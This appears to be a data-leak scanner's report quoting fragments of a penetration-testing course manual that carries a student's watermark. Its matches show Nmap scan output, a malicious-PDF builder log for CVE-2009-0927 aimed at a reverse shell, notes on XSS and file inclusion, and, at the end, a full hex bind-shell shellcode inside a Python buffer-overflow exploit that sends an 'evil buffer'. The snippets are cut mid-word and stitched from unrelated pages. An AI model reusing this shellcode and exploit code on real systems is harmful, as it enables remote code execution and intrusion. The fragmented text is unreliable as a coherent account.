Potential leak of data: Nmap Scan Report


Detected 2 occurrence(s) of ‘Nmap scan report for’:
ECLABS\WIN-HS8GZGTAPBH$ (RID: 1000)
Nmap done: 1 IP address (1 host up) scanned in 6.72 seconds
root@bt:~# nmap 192.168.11.221 --script smb-check-vulns.nse
Starting Nmap 5.21 ( http://nmap.org ) at 2010-03-11 12:36 EST
NSE: Script Scanning completed.
Nmap scan report for 192.168.11.221
...
135/tcp open msrpc
139/tcp open netbios-ssn
OS-5777-PWB-Apurva-Rustagi
133
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1025/tcp open NFS-or-IIS
1027/tcp 
Detected 69 occurrence(s) of ‘shellcode’:
ce
again, we discover that we can use two addition bytes of the file without ruining its structure (bytes
29,30). From this position, we can perform a short jump to our shellcode.
After modifying our exploit, we create two “island hops†directly to our shellcode, and finally gain full
controlled code execution!
OS-5777-PWB-Apurva-Rustagi
262
10.4 MS06-001 – an example from MSF
Another horrendous vulnerability in Windows systems was Vulnerability in Graphics Rendering Engine
(WMF). This vulnerability affecte
Detected 16 occurrence(s) of ‘CVE\-20[0-1]{1}[0-9]{1}\-[0-9]{4}’:
er
[-] Creating PDF file 'victim.pdf' DLL file 'output.dll' ...
[-] Reading DLL data ...
[-] Preparing payload (javascript+shellcode+dll) ...
[-] Writing PDF file 'victim.pdf' with payload inside ...
[+] Done, [Coromputer] is alive! alive!
root@bt:~/CVE-2009-0927_package#
Once the file is opened by a vulnerable victim – we should get a reverse shell!
OS-5777-PWB-Apurva-Rustagi
255
10.3 MS07-017 – From PoC to Shell
One of the nastiest client side attacks ever to hit Microsoft is probably the Microsoft Windows
Detected 2 occurrence(s) of ‘remote file inclusion’:
ck is session specific, meaning that it will work as long as the victim user stays
logged on, or until their session expires. These are just a couple of simple examples of how powerful
XSS attacks may be.
OS-5777-PWB-Apurva-Rustagi
313
13.2 Local and Remote File Inclusion
Local and remote include vulnerabilities are commonly found in poorly written PHP code. The
exploitation of these vulnerabilities also depends on the web server configuration, specifically php.ini
values such as register_globals and allow_url wrappers.
Detected 52 occurrence(s) of ‘\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}\\x[0-9a-f]{2}’:
\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"
"\x5b\x5e\x52\x68\xff\x02\x11\x5c\x6a\x10\x51\x50\x89\xe1\x6a"
"\x66\x58\xcd\x80\x89\x41\x04\xb3\x04\xb0\x66\xcd\x80\x43\xb0"
"\x66\xcd\x80\x93\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x68\x2f"
"\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0"
"\x0b\xcd\x80")
crash="\x90"*200 + shellcode + "\x43" * 4090 + "\x42\x42\x42\x42" +"D"*7
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "[*]Sending evil buffer..."